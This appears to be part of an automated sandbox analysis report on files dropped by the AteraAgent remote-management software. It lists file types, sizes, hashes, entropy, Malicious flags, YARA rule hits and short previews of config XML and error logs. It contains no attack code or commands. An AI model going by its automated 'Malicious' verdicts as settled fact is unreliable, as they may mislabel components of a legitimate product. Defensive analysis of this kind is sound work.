                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):138288
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.17954530016547
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:G3XFz0qjCIPMAxlUXUKoPfw0kG71AHK7cnO:U0qjCSRE+fw0kG719
                                                                                                                                                                                                                                                                                              MD5:6D055BBD0463057997B216FA41FC1BAA
                                                                                                                                                                                                                                                                                              SHA1:0E3B5685453BFE674252EEFE7B29DDFFE3394F36
                                                                                                                                                                                                                                                                                              SHA-256:94571C1156471E113A0BA58686D0E0F8C8A18B7F5415A17CC00688D6901D6DD6
                                                                                                                                                                                                                                                                                              SHA-512:D3D1FB3588D4AE7279244086069DEF2145FDD341099BD66B801CE1F7EB18F4F68B0043D3CF4BA5C8FA3FA680EF228C3371743AF1E9DCAA64711321EC6A94FCEC
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):17968
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.673983708245621
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Oh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeBhKr+:Oy9eEpYinAMxCAcr+
                                                                                                                                                                                                                                                                                              MD5:351EE6E0FBE6951D43F195DBFD34911A
                                                                                                                                                                                                                                                                                              SHA1:2FAAD5BD1D08D9791C941F6F01BA41473C12DD1F
                                                                                                                                                                                                                                                                                              SHA-256:8B4AF4380F5083A9DC11F5E74FEA942A34DE4AA3740EE0DBCEF92A95AFD656F6
                                                                                                                                                                                                                                                                                              SHA-512:00A0600E0E4541058B8FF5A7314E0C2779B5BA5E3F9FBE9F15556E84D84D8B3C0317116B29A832CB038457EF6CE1FA88149C18E7DD33D27A3ADD3AFFAC5FF9D7
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):342316
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999331258360695
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:6144:Ir6VUI82xfkgpWrvL/JVW2L3ukK29GSya5GZ7F2vtVygTNBr6VEZGqTkxU4sAQgY:Ir6+jAfk/rD/J3Lun8EaekVcgTzr6GZR
                                                                                                                                                                                                                                                                                              MD5:09447F135F7F4486C165061CF443C569
                                                                                                                                                                                                                                                                                              SHA1:3AD4264DB3112F845D35C112AABEA9CBB2E21AFA
                                                                                                                                                                                                                                                                                              SHA-256:0142E2CA4F93C9631591065DC53944A86E4B961620F4FAF1FE8B61A8B2867C9B
                                                                                                                                                                                                                                                                                              SHA-512:BE678FB5CA389198A5CC474C8E9E9D0C79A92A582CB81325B13D8BE226725AD04FAA6ECC3B4B7CECAEDAA6F15EC13F01C0276100EE19FAAF0A1B1DD7D061F31B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):72744
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.510938920637226
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:r8V3tfciq9s2k7Xvpci+yLYCJoUu7Q6P+O76q:klPna02B86P+ON
                                                                                                                                                                                                                                                                                              MD5:67FEF41237025021CD4F792E8C24E95A
                                                                                                                                                                                                                                                                                              SHA1:C47A5A33F182C8244798819E2DC5A908D51703E8
                                                                                                                                                                                                                                                                                              SHA-256:C936879FBB1AA6D51FE1CDC0E351F933F835C0BF0E30AEF99A4E19A07A920029
                                                                                                                                                                                                                                                                                              SHA-512:232015FE6BEE6637D915648A256474FC3DF79415AC90BABDFC2E3DED06C2F36FCE85573EC7670F2A05126AA5F24A570B36885E386061666D9EAA1F0DA67A093E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):541
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.097123194334321
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:MMHdGp2VvOF9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdsIOvPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                                                                              MD5:D0EFB0A6D260DBE5D8C91D94B77D7ACD
                                                                                                                                                                                                                                                                                              SHA1:E33A8C642D2A4B3AF77E0C79671EAB5200A45613
                                                                                                                                                                                                                                                                                              SHA-256:7D38534766A52326A04972A47CACA9C05E95169725D59AB4A995F8A498678102
                                                                                                                                                                                                                                                                                              SHA-512:A3F1CFF570201B8944780CF475B58969332C6AF9BEA0A6231E59443B05FC96DF06A005FF05F78954DBE2FEC42DA207F6D26025AA558D0A30A36F0DF23A44A35C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):12
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhXRLW:WBRi
                                                                                                                                                                                                                                                                                              MD5:B22628235C1F44AE054091C8FDC82D23
                                                                                                                                                                                                                                                                                              SHA1:70C8E5ABD9D2D8A18B769F6E71819FB53B273B9B
                                                                                                                                                                                                                                                                                              SHA-256:B31673E38897D5D84558E2745D02C553649A50063A9F0E7DE7E71BBA89916232
                                                                                                                                                                                                                                                                                              SHA-512:C1097690938F3EDCBA20802DFB77880FB29D1F8B70C62FA76D1828613D57355FD04C0B3D26DA90128DB2DF2E63E4E30C8E195B84452C0931B8CB2F043D5BBA98
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=24.3
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):96808
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.179705686579105
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:FJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvO1762s:FQUm2H5KTfOLgxFJjE50vksVUfPvO1m
                                                                                                                                                                                                                                                                                              MD5:C548EA0CD65F5981C2DF82A0177A9D3A
                                                                                                                                                                                                                                                                                              SHA1:5D082BC6BC2D1F2267AE8525F3A528A0B58C3161
                                                                                                                                                                                                                                                                                              SHA-256:BEAFAA0CF51CE914B58482094044A6CC742C3269431A812D5683CA3034ACCD84
                                                                                                                                                                                                                                                                                              SHA-512:530AE2069185897612E0129135065954379F75F6C9F9DAEE3F7D9DFE49C7CEAFC8807DC866591F39337410FAFA76733705C316912F3A12AE85565ECB775476F4
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710184
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.960555604702895
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:UBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTU4:UBjk38WuBcAbwoA/BkjSHXP36RMGN
                                                                                                                                                                                                                                                                                              MD5:1792F462B4908235FBA6B3B4B2203276
                                                                                                                                                                                                                                                                                              SHA1:E1B0CF8559C330377E2DE7FEE9FCC0FC3D34566A
                                                                                                                                                                                                                                                                                              SHA-256:8CA1C3651A6F118C80E712BCB9C44031EB3D8C7180A60EDA5F2B24A0584082A9
                                                                                                                                                                                                                                                                                              SHA-512:7AB9E256A4359A5560BD8C10014591F350F2788F72693234C16AA0B75F95F9EE3CF5E219B97A33944A5E730202BD355064885FD060812EE150107FFC84C92F65
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):18
                                                                                                                                                                                                                                                                                              Entropy (8bit):2.858278308418045
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WaUQSSOQ:WfH+
                                                                                                                                                                                                                                                                                              MD5:461B4F4FB8C02E277016F6A8EFC9B02C
                                                                                                                                                                                                                                                                                              SHA1:6474936F26D1171B8743B211B3661A9DF99B52CA
                                                                                                                                                                                                                                                                                              SHA-256:62B42F7ECDACFD9A71E1B73B6F7A70B8C1FB47D54C859BAE9E3168EECA6FF9ED
                                                                                                                                                                                                                                                                                              SHA-512:8F3819D6A675AC3237A0CB6D0B9B37E73ADC076A8CD125495E7C8B6B56506FF5ACE06B5F05968F6F08A523D4984A022F5D67B955724738B5AF4F5B86917C33E4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:638717435157779332
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.037452826908326
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:YhKSLJf2B4VXdly08HvI63JNFH6qJYCnf2RO0Yj:Y5fVX8HvI2rH6qmCeoF
                                                                                                                                                                                                                                                                                              MD5:4EBE17902365F2BBD25015948F754237
                                                                                                                                                                                                                                                                                              SHA1:99ED8AAA20219CB2C5436EFB7075738DE59D5DFD
                                                                                                                                                                                                                                                                                              SHA-256:F867FCAC0316E5C81E66C62C9EAE25BEF5F2C39F70BD244EFF724CE1196E66EC
                                                                                                                                                                                                                                                                                              SHA-512:0A457D4CFFD4BDA81F0B21524E8BD345915B6BE8B3DA915C3C29E7F6536184DBB4340C404C908490F9569C81C0A63484E75C951C87CF4F1728866580BE1A5447
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:{"DownloadedAt":"2025-01-08T10:30:00.7091879-05:00","Hash":"nNa6OtJ9rJZ/Bzy8rYj++Q=="}
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1560
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.061010581469363
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:5Q0/bqd+sVNPwliQ0/bqd+sVNPwyQ0/bqd+sVNPwkEK:OUbgd50Ubgd5cUbgd5N9
                                                                                                                                                                                                                                                                                              MD5:FE5DD84A714EF3BEBBC96647CD7B1FAA
                                                                                                                                                                                                                                                                                              SHA1:C2AD9F433DC542305121C356591B8CED5EE57358
                                                                                                                                                                                                                                                                                              SHA-256:B4B6C63CBE233DBB78380A4DFBFF5BE732F5E5762878EBEA3A1CA8155D7D23A6
                                                                                                                                                                                                                                                                                              SHA-512:AD81FFC5933C38153A955C16EB1E36CD7D7C950B68B281A4CF7C5CC706072D5B16B96C7967D881C066434896F5750602792D2FF8FB3EC2E46C7007BA5A422185
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:..06/01/2025 06:58:35 Failed to set key: RequestPermissionOption with value: ..Exception: System.ArgumentNullException: Value cannot be null...Parameter name: value.. at System.ThrowHelper.ThrowArgumentNullException(ExceptionArgument argument).. at Microsoft.Win32.RegistryKey.SetValue(String name, Object value, RegistryValueKind valueKind).. at AgentPackageSTRemote.Persistence.AteraSettings.WindowsAteraSplashtopRegistry.SetValue(String key, Object value, SettingKeyType settingKeyType)..06/01/2025 06:58:35 Failed to set key: RequirePasswordOption with value: ..Exception: System.ArgumentNullException: Value cannot be null...Parameter name: value.. at System.ThrowHelper.ThrowArgumentNullException(ExceptionArgument argument).. at Microsoft.Win32.RegistryKey.SetValue(String name, Object value, RegistryValueKind valueKind).. at AgentPackageSTRemote.Persistence.AteraSettings.WindowsAteraSplashtopRegistry.SetValue(String key, Object value, SettingKeyType settingKeyType)..06/01/2025
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):687102
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9992259812758135
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:12288:YQCewZw3IoWZyN0mMaER+jcyO3IPYpP9UE9bIIVwSTgSC7mxc:YreT3xGmMaVjcKPEPR9bIIhYh
                                                                                                                                                                                                                                                                                              MD5:96E50BBCA30D75AF7B8B40ACF8DDA817
                                                                                                                                                                                                                                                                                              SHA1:4B1255280DFF8DE8B7BE47DEF58F83F6EC39DED6
                                                                                                                                                                                                                                                                                              SHA-256:A3AD00CCB61BC87D58EB7977F68130B78A0B95E74D61E6A4624AC114CCDE5736
                                                                                                                                                                                                                                                                                              SHA-512:0034C08CB878B703F272E3FD2734BB928FF1BDBA85CF79A151519B019C83BD4D199C80AF0AA30DB28EF82F7EE68A9D59DCAEDE92F83BFE8787F6A5D4D5E9817C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):51752
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.286975372577971
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:isXr7JfmSn0jVGcxf3OI3NjkfE53Tnz8zHFeDZkqEpYi60yHv:iOFnart3NwfE5Dz8REZkL76bHv
                                                                                                                                                                                                                                                                                              MD5:5BB0687E2384644EA48F688D7E75377B
                                                                                                                                                                                                                                                                                              SHA1:44E4651A52517570894CFEC764EC790263B88C4A
                                                                                                                                                                                                                                                                                              SHA-256:963A4C7863BEAE55B1058F10F38B5F0D026496C28C78246230D992FD7B19B70A
                                                                                                                                                                                                                                                                                              SHA-512:260B661F52287AF95C5033B0A03AC2E182211D165CADB7C4A19E5A8CA765E76FC84B0DAF298C3ECCB4904504A204194A9BF2547FC91039C3EC2D41F9977FF650
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):923
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.156246271896278
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:Jds4F7k1hOXrRT2/2E10PT2/+w0E1UrPT2/+7Trln:3ss757Rkqk+wik+7Nn
                                                                                                                                                                                                                                                                                              MD5:D6FCBCF9C6ABC2F051772E7A7D5EDFD5
                                                                                                                                                                                                                                                                                              SHA1:33D9962BCC42F021A7CEADF3D1C613B4643C66F6
                                                                                                                                                                                                                                                                                              SHA-256:F523D40AE141AA8899B053D77117FCF50639708757AD4A050F3A11E8582A894A
                                                                                                                                                                                                                                                                                              SHA-512:07DA40F1C43A1E35582ADE5DBBAEB47EC2922C42241BD4B950EFA76407597CF838338E27F3F5197E02F5209B27542207BEDBA9B85681955E3C326C95C1F5AC22
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />...</startup>...<runtime>....<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.....<dependentAssembly>......<assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />......<bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.....</dependentAssembly>.....<dependentAssembly>......<assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />......<bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.....</dependentAssembly>.....<dependentAssembly>......<assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />......<bindingRedirect oldVersion="0.0.0.0-4.0.1.1" newVersion="4.0.1.1" />.....</dependentAssembly>....</assemblyBinding>...</runtime>..</configuration>
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5465935642949384
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhXSgXn:WBZXn
                                                                                                                                                                                                                                                                                              MD5:EB0865EBB86960EC4069DECECBF43ABC
                                                                                                                                                                                                                                                                                              SHA1:9BA2E92AB9F9DB9242EFDC5FA356B2D7D1F52D7D
                                                                                                                                                                                                                                                                                              SHA-256:BEFABB04180AC3DA1D823D4CDF9F3636832F5115BC42F7E39CB26A56FB794CA4
                                                                                                                                                                                                                                                                                              SHA-512:5E8BDA4CA7B3C89FD38BE682DB8D5BB1B5567CE1A25116D539A1510BDAF11E3EBFAE835EC1B54BEDF5D38DACE58EEE63AFCD8049874DBFBB02A34B368AA25322
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=27.12
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):14888
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.879525569919863
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:wC9aM0P8P2Nyby2sE9jBF6IYiYF85S35IVnxGUHFi3o86A/pT:wC9abP8ONyb8E9VF6IYijSJIVxu6A/pT
                                                                                                                                                                                                                                                                                              MD5:8BD230F842430C8DD3BE4722B15A779B
                                                                                                                                                                                                                                                                                              SHA1:34422CB7617698BEB5CE61D24C2FC4935F8DEEA9
                                                                                                                                                                                                                                                                                              SHA-256:E94DB759123A44C61ADDF525BBF3E08FFA85529061A48D68BC636F171A3EFB77
                                                                                                                                                                                                                                                                                              SHA-512:A7BCDB7613E74CBDDDEDAE8A895B91F21AFF9464A52D0EC5DDD3144DE9F2AB2CB2D3A7C2A1C976E0AB982A122332DE54787B6C2F3FB1BDD529FA974154420772
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):112680
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.1795911171130955
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:QtsGQngrGJbFzxsIehOKHbevOblTQFHMbd6U/pC18VdUEvfkAS07K760:Q6fBzxWoOOibd6U/Y18hK07KD
                                                                                                                                                                                                                                                                                              MD5:195C0C9415221A7144C7614FE4A7487F
                                                                                                                                                                                                                                                                                              SHA1:2FF047CA961B801683E0FF1832475B3C7C3E1B15
                                                                                                                                                                                                                                                                                              SHA-256:A9E0FD283F4B8CDAE56E1AE2C8996489B7FF9379B0029A6C9AE71FE9DADCC12E
                                                                                                                                                                                                                                                                                              SHA-512:74DA09B893D2F0CD9F7542D7822E23B911C9900DD00A0E7458964901A9C03C4A42E848F2A1C1DE3592261A2D0626DD82964731CB5A918FE31EDD31F4A32CF01A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):38952
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.309196886140639
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:/INsi1A6I1MLzHS0+iFJBn5gpKNEpYi60wgYF:gNsii6v/HS0+OJd5gpKm76tga
                                                                                                                                                                                                                                                                                              MD5:B27F689B547835884AADE60304FC4860
                                                                                                                                                                                                                                                                                              SHA1:72A9C72DC7F0D0312F09BBE3F605A36AF9D814B3
                                                                                                                                                                                                                                                                                              SHA-256:01F80C32D73709B034E346256E4240F8A4336C7413A6B5F2DE3309F2233F53E0
                                                                                                                                                                                                                                                                                              SHA-512:7BDF3A1B5895F31205D17E6A02A495D8875B0F0F802E0C1AD1F95DE391BD1317CCFD8C0A772EF4FB993598E746FBF203CE87E20AB46544C6F9A1C1101AE2E2B9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16424
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.854928178747648
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:D1c5aLPiraWj4/wLNyb8E9VF6IYijSJIVx99hvHalN:D1cGmXNHEpYi60X9SN
                                                                                                                                                                                                                                                                                              MD5:63BDE840E460E4C8546366DF319B2C1A
                                                                                                                                                                                                                                                                                              SHA1:9DA75B897704BA1B28091F1D442A832EB175D648
                                                                                                                                                                                                                                                                                              SHA-256:5907BFCC210749BDC7619CB1A433C90A3280005D5DA344D134748B336F86EB55
                                                                                                                                                                                                                                                                                              SHA-512:04C3248EE12D7E199B7B9EA45C9B001082D1D6E8BE166F2BAFDCF28F4ABD9B029A08610ACA0ABAFA968C1E3361042876F410E2000FB97A1500D5FA60C4026D08
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1017
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.00184675687532
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JdArdEtPF7NhOXrRH2/dV0PH2/+w3VUrPH2/+789y:3Ar+z7O7Rgdsg+w3Sg+78w
                                                                                                                                                                                                                                                                                              MD5:8A743B2BAC31EB00D4BDA0EBC8DF160B
                                                                                                                                                                                                                                                                                              SHA1:5564F6A8F02973D040E8409E21B2A18ECA2CA8EB
                                                                                                                                                                                                                                                                                              SHA-256:31A69A6D9423CE1BCF98F5281DEB1B8F537D95609CDFA03AF9A41CBF00D1243A
                                                                                                                                                                                                                                                                                              SHA-512:9F14C687EF076CEB4B903E2C5803DCB9401BDEADC00B0E090765E67B54E9BEEC733B087609D76C605C8485C7E446E8DB3A0D8AA3E17C969FC155F069070BB543
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
